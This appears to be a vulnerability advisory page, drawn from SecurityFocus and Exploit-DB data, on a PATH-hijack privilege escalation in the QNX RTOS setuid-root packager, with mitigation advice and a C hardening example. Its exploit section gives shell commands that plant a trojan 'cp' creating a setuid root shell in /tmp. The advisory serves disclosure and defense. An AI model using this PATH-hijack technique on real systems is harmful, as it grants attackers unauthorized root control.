Vendor: RTOS Packager
By: SecurityFocus
CVSS: 7.2 (HIGH)
Path Manipulation
CWE: 22
Product Name: RTOS Packager
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2002

QNX RTOS Packager Vulnerability

It has been reported that the packager fails to use absolute paths to execute system commands. This could potentially allow an attacker to trick the program into running a trojaned binary. Because the vulnerable packager is installed setuid root by default, this could allow a local attacker to take complete control over a system.

Mitigation:

Ensure that absolute paths are used when executing system commands.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/6146/info

A vulnerability has been discovered in an application packager shipped with QNX RTOS. It should be noted that the vulnerable packager is installed setuid root by default.

It has been reported that the packager fails to use absolute paths to execute system commands. This could potentially allow an attacker to trick the program into running a trojaned binary.

Because the vulnerable packager is installed setuid root by default, this could allow a local attacker to take complete control over a system. 

$ cat > cp <<EOF
> #!/bin/sh
> /bin/cp /bin/sh /tmp/sh
> chmod 4755 /tmp/sh
> EOF
$ chmod 755 cp

The attacker then modifies the PATH environment variable to search
the current working directory before anything else:

$ PATH=$PWD:$PATH

The attacker now creates a directory and calls the packager on that
created directory:

$ mkdir temp
$ packager temp
...

The packager will ask a number of questions. When the procedure is
complete, a root shell will be waiting for the attacker:

$ ls -l /tmp/sh
-rwsr-xr-x 1 root 100 153908 May 11 05:36 /tmp/sh
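
The mitigation stated on this page, as an added C example that is not the packager's code and not part of the original advisory: a hypothetical helper that runs cp by PATH lookup, beside a hardened form that calls an absolute path with a fixed environment. The function names, the /bin/cp location and the PATH value are assumptions.

```c
#define _POSIX_C_SOURCE 200809L
#include <stdio.h>
#include <stdlib.h>
#include <sys/wait.h>
#include <unistd.h>

/* Assumption: the trusted copy utility is /bin/cp, as in the session above. */
static const char CP_PATH[] = "/bin/cp";

/* Reap the child; return its exit status, or -1 on error or signal. */
static int wait_status(pid_t pid)
{
    int st;
    if (pid < 0 || waitpid(pid, &st, 0) < 0)
        return -1;
    return WIFEXITED(st) ? WEXITSTATUS(st) : -1;
}

/* Before (hypothetical): execvp() resolves "cp" through the inherited PATH,
 * so the caller's environment decides which file a setuid program runs. */
int copy_path_lookup(const char *src, const char *dst)
{
    char *const argv[] = { "cp", (char *)src, (char *)dst, NULL };
    pid_t pid = fork();
    if (pid == 0) {
        execvp("cp", argv);
        _exit(127);                 /* exec failed */
    }
    return wait_status(pid);
}

/* After: absolute path, and a fixed environment instead of the caller's. */
int copy_hardened(const char *src, const char *dst)
{
    char *const argv[] = { "cp", (char *)src, (char *)dst, NULL };
    char *const envp[] = { "PATH=/bin:/usr/bin", NULL };
    pid_t pid = fork();
    if (pid == 0) {
        execve(CP_PATH, argv, envp);
        _exit(127);                 /* exec failed */
    }
    return wait_status(pid);
}

int main(int argc, char **argv)
{
    if (argc != 3)
        return 2;                   /* usage: prog SRC DST */
    return copy_hardened(argv[1], argv[2]);
}
```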